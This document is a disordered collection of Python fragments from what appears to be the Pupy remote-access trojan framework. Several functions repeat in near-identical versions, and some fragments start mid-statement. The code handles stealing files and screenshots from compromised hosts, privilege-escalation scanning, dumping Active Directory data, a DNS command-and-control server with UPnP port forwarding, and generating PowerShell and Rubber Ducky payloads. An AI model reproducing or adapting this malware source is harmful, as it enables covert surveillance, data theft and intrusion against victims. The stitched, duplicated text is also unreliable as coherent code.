def run(self, args):
ros = self.client.conn.modules['os']
remote_file = ros.path.expandvars(args.remote_file)
if args.local_file:
local_file = os.path.expandvars(args.local_file)
if os.path.isdir(local_file):
local_file = os.path.join(local_file,
ros.path.basename(remote_file))
else:
config = PupyConfig()
filesdir = config.get_folder('downloads',
{'%c': self.client.short_name()})
remote_file_basename = ros.path.basename(remote_file)
local_file = os.path.join(filesdir, remote_file_basename)
local_dir = os.path.dirname(local_file)
if not os.path.exists(local_dir):
os.makedirs(local_dir)
self.info('downloading %s ...' % remote_file)
start_time = time.time()
download(self.client.conn,
remote_file,
local_file,
chunk_size=8 * 1024 * 1024)
size = os.path.getsize(local_file)
self.success('file downloaded from remote:%s to local:%s' %
(remote_file, local_file))
total_time = round(time.time() - start_time, 2)
self.info('%s bytes downloaded in: %ss. average %sKB/s' %
(size, total_time, round((size / total_time) / 10**3, 2)))
def ssl_authenticator():
keystr = b''
certstr = b''
client_cert_required = True
try:
import pupy_credentials
keystr = pupy_credentials.SSL_BIND_KEY
certstr = pupy_credentials.SSL_BIND_CERT
castr = pupy_credentials.SSL_CA_CERT
role = 'CLIENT'
except:
from pupylib.PupyConfig import PupyConfig
from pupylib.PupyCredentials import Credentials
config = PupyConfig()
credentials = Credentials()
client_cert_required = config.getboolean('ssl', 'client_cert_required')
keystr = credentials['SSL_BIND_KEY']
certstr = credentials['SSL_BIND_CERT']
castr = credentials['SSL_CA_CERT']
role = credentials.role
return PupySSLAuthenticator(role,
keystr,
certstr,
castr,
client_cert_required=client_cert_required)
def run(self, args):
ros = self.client.conn.modules['os']
remote_file = ros.path.expandvars(args.remote_file)
if args.local_file:
local_file = os.path.expandvars(args.local_file)
if os.path.isdir(local_file):
local_file = os.path.join(local_file, ros.path.basename(remote_file))
else:
config = PupyConfig()
filesdir = config.get_folder('downloads', {'%c': self.client.short_name()})
remote_file_basename = ros.path.basename(remote_file)
local_file = os.path.join(filesdir, remote_file_basename)
local_dir = os.path.dirname(local_file)
if not os.path.exists(local_dir):
os.makedirs(local_dir)
self.info('downloading %s ...'%remote_file)
start_time = time.time()
download(self.client.conn, remote_file, local_file, chunk_size=8*1024*1024)
size = os.path.getsize(local_file)
self.success('file downloaded from remote:%s to local:%s'%(remote_file, local_file))
total_time=round(time.time()-start_time, 2)
self.info(
'%s bytes downloaded in: %ss. average %sKB/s'%(
size, total_time, round((size/total_time)/10**3, 2)
)
)
def ssl_authenticator():
keystr = b''
certstr = b''
client_cert_required = True
try:
import pupy_credentials
keystr = pupy_credentials.SSL_BIND_KEY
certstr = pupy_credentials.SSL_BIND_CERT
castr = pupy_credentials.SSL_CA_CERT
role = 'CLIENT'
except:
from pupylib.PupyConfig import PupyConfig
from pupylib.PupyCredentials import Credentials
config = PupyConfig()
credentials = Credentials()
client_cert_required = config.getboolean('ssl', 'client_cert_required')
keystr = credentials['SSL_BIND_KEY']
certstr = credentials['SSL_BIND_CERT']
castr = credentials['SSL_CA_CERT']
role = credentials.role
return PupySSLAuthenticator(
role, keystr, certstr, castr,
client_cert_required=client_cert_required
)
def __loadRubberDuckyConf__(self):
'''
'''
config = PupyConfig()
self.encoderPath = config.get("rubber_ducky","encoder_path")
self.keyboardLayoutPath = config.get("rubber_ducky","default_keyboard_layout_path")
if self.encoderPath == "TO_FILL":
print(colorize("[+] ","red")+"The 'encoder_path' value has to be filled in pupy.conf for generating inject.bin")
if self.keyboardLayoutPath == "TO_FILL":
print(colorize("[+] ","red")+"The 'default_keyboard_layout_path' value has to be filled in pupy.conf for generating inject.bin")
def main():
from pupylib.utils.term import hint_to_text
from traceback import print_exc
def display(data):
print hint_to_text(data)
Credentials.DEFAULT_ROLE = 'CLIENT'
config = PupyConfig()
Credentials(config=config, validate=True)
parser = get_parser(argparse.ArgumentParser, config)
try:
args = parser.parse_args()
pupygen(args, config, None, display)
except NoOutput:
sys.exit(0)
except InvalidOptions:
sys.exit(1)
except (ValueError, EncryptionError), e:
if args.debug:
print_exc()
display(Error(e))
def __init__(self,
igd=None,
connect_host=None,
recursor=None,
connect_transport='ssl',
connect_port=443,
config=None,
credentials=None):
credentials = credentials or Credentials()
config = config or PupyConfig()
self.config = config
self.credentials = credentials
self.igd = igd
fdqn = self.config.get('pupyd', 'dnscnc').split(':')
domain = fdqn[0]
if len(fdqn) > 1:
port = int(fdqn[1])
else:
port = 53
listen = str(config.get('pupyd', 'address') or '0.0.0.0')
prefer_external = config.getboolean('gen', 'external')
self.host = [
str(
get_listener_ip(external=prefer_external,
config=config,
igd=igd))
]
self.port = get_listener_port(config, external=prefer_external)
self.transport = config.get('pupyd', 'transport')
recursor = config.get('pupyd', 'recursor')
if recursor and recursor.lower() in ('no', 'false', 'stop', 'n',
'disable'):
recursor = None
self.dns_domain = domain
self.dns_port = port
self.dns_listen = listen
self.dns_recursor = recursor
self.handler = PupyDnsCommandServerHandler(
domain,
credentials['DNSCNC_PRIV_KEY'],
recursor=recursor,
config=self.config)
self.server = DnsCommandServer(self.handler,
address=listen,
port=int(port))
if self.igd and self.igd.available:
self.igd.AddPortMapping(53, 'UDP', int(port))
self.igd.AddPortMapping(53, 'TCP', int(port))
self.server.start()
def run(self, args):
screens = self.client.remote('screenshot', 'screens')
screenshot = self.client.remote('screenshot', 'screenshot')
if self.client.is_android():
self.error("Android target, not implemented yet...")
else:
if args.enum:
self.rawlog('{:>2} {:>9} {:>9}\n'.format('IDX', 'SIZE', 'LEFT'))
for i, screen in enumerate(screens()):
if not (screen['width'] and screen['height']):
continue
self.rawlog('{:>2}: {:>9} {:>9}\n'.format(
i,
'{}x{}'.format(screen['width'], screen['height']),
'({}x{})'.format(screen['top'], screen['left'])))
return
config = self.client.pupsrv.config or PupyConfig()
filepath_base = config.get_file('screenshots', {'%c': self.client.short_name()})
try:
screenshots, error = screenshot(args.screen)
except Exception, e:
self.error('Impossible to take a screenshot ("{0}"). Abording...'.format(e))
return -1
if not screenshots:
self.error(error)
return -1
else:
self.success('number of monitor detected: %s' % str(len(screenshots)))
for i, screenshot in enumerate(screenshots):
filepath = filepath_base + '-{}.png'.format(i)
with open(filepath, 'w') as out:
out.write(screenshot)
self.success(filepath)
if args.view:
viewer = config.get('default_viewers', 'image_viewer') or 'xdg-open'
found = False
for p in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(p, viewer)):
with open(os.devnull, 'w') as DEVNULL:
subprocess.Popen(
[viewer, filepath],
stdin=DEVNULL, stdout=DEVNULL, stderr=DEVNULL)
found = True
break
if not found:
self.error('Default viewer not found: %s' % viewer)
def run(self, args):
filepath = None
if args.write:
config = self.client.pupsrv.config or PupyConfig()
folder = config.get_folder('beroot', {'%c': self.client.short_name()})
filepath = path.join(folder, str(datetime.datetime.now()).replace(" ","_").replace(":","-")+"-beroot.txt")
with redirected_stdio(self):
try:
for r in self.client.conn.modules["beRoot"].run(args.cmd, args.list, args.write):
self.print_output(output=r, write=args.write, file=filepath)
except Exception as e:
print e
if args.write:
self.success(filepath)
def run(self, args):
rscreenshot = self.client.conn.modules['screenshot']
if self.client.is_android() == True:
self.error("Android target, not implemented yet...")
else:
if args.enum:
self.rawlog('{:>2} {:>9} {:>9}\n'.format(
'IDX', 'SIZE', 'LEFT'))
for i, screen in enumerate(rscreenshot.screens()):
if not (screen['width'] and screen['height']):
continue
self.rawlog('{:>2}: {:>9} {:>9}\n'.format(
i, '{}x{}'.format(screen['width'], screen['height']),
'({}x{})'.format(screen['top'], screen['left'])))
return
config = self.client.pupsrv.config or PupyConfig()
folder = config.get_folder('screenshots',
{'%c': self.client.short_name()})
rscreenshot.takeScreenshot()
screenshots, error = rscreenshot.screenshot(args.screen)
if not screenshots:
self.error(error)
else:
self.success('number of monitor detected: %s' %
str(len(screenshots)))
for i, screenshot in enumerate(screenshots):
filepath = path.join(
folder,
str(datetime.datetime.now()).replace(" ", "_").replace(
":", "-") + '-' + str(i) + ".png")
with open(filepath, 'w') as out:
out.write(screenshot)
self.success(filepath)
if args.view:
viewer = config.get('default_viewers', 'image_viewer')
subprocess.Popen([viewer, filepath])
def run(self, args):
screens = self.client.remote('screenshot', 'screens')
screenshot = self.client.remote('screenshot', 'screenshot')
if self.client.is_android() == True:
self.error("Android target, not implemented yet...")
else:
if args.enum:
self.rawlog('{:>2} {:>9} {:>9}\n'.format(
'IDX', 'SIZE', 'LEFT'))
for i, screen in enumerate(screens()):
if not (screen['width'] and screen['height']):
continue
self.rawlog('{:>2}: {:>9} {:>9}\n'.format(
i, '{}x{}'.format(screen['width'], screen['height']),
'({}x{})'.format(screen['top'], screen['left'])))
return
config = self.client.pupsrv.config or PupyConfig()
filepath_base = config.get_file('screenshots',
{'%c': self.client.short_name()})
screenshots, error = screenshot(args.screen)
if not screenshots:
self.error(error)
else:
self.success('number of monitor detected: %s' %
str(len(screenshots)))
for i, screenshot in enumerate(screenshots):
filepath = filepath_base + '-{}.png'.format(i)
with open(filepath, 'w') as out:
out.write(screenshot)
self.success(filepath)
if args.view:
viewer = config.get('default_viewers', 'image_viewer')
subprocess.Popen([viewer, filepath])
port=args.oneliner_listen_port,
useTargetProxy=False)
else:
serve_ps1_payload(conf,
link_ip=link_ip,
port=args.oneliner_listen_port,
useTargetProxy=True)
elif args.format == "rubber_ducky":
rubber_ducky(conf).generateAllForOStarget()
else:
raise ValueError("Type %s is invalid." % (args.format))
print(ok + "OUTPUT_PATH = %s" % os.path.abspath(outpath))
print(ok + "SCRIPTLETS = %s" % args.scriptlet)
print(ok + "DEBUG = %s" % args.debug)
return os.path.abspath(outpath)
if __name__ == '__main__':
Credentials.DEFAULT_ROLE = 'CLIENT'
check_templates_version()
config = PupyConfig()
parser = get_parser(argparse.ArgumentParser, config)
try:
pupygen(parser.parse_args(), config)
except InvalidOptions:
sys.exit(0)
except Exception, e:
logging.exception(e)
sys.exit(str(e))
def dump(self, args):
addump = self.client.remote('ad', 'dump', False)
config = self.client.pupsrv.config or PupyConfig()
context = {
'last_name': None,
'last_fobj': None,
}
completion = Event()
def on_data(name, payload):
if name == 'dns':
self.success('DNS server selected: {}'.format(payload))
elif name == 'ldap':
self.success('LDAP server selected: {}'.format(payload))
elif name == 'error':
self.error('Error: {}'.format(payload))
else:
is_first = False
if context['last_name'] != name:
is_first = True
if context['last_name']:
self.success('Completed {}'.format(
context['last_name']))
dest = config.get_file(
'ad', {
r'%c': self.client.short_name(),
r'%n': basename(name),
r'%r': args.realm
})
self.success('Dumping {} -> {}'.format(name, dest))
context['last_name'] = name
if context['last_fobj']:
context['last_fobj'].write(u'\n]')
context['last_fobj'].close()
context['last_fobj'] = io_open(dest,
'w+',
encoding='utf-8')
context['last_fobj'].write(u'[\n')
for record in from_tuple_deep(payload):
if is_first:
is_first = False
else:
context['last_fobj'].write(u',')
record_json = dumps(record,
indent=2,
sort_keys=True,
default=json_default,
ensure_ascii=False)
context['last_fobj'].write(record_json)
def on_complete():
if context['last_fobj']:
context['last_fobj'].write(u']')
context['last_fobj'].close()
context['last_fobj'] = None
if context['last_name']:
self.success('Completed {}'.format(context['last_name']))
context['last_name'] = None
self.success('Dump completed')
completion.set()
self.terminate = addump(on_data, on_complete, args.realm,
args.global_catalog, args.filter
or args.target, not args.full)
completion.wait()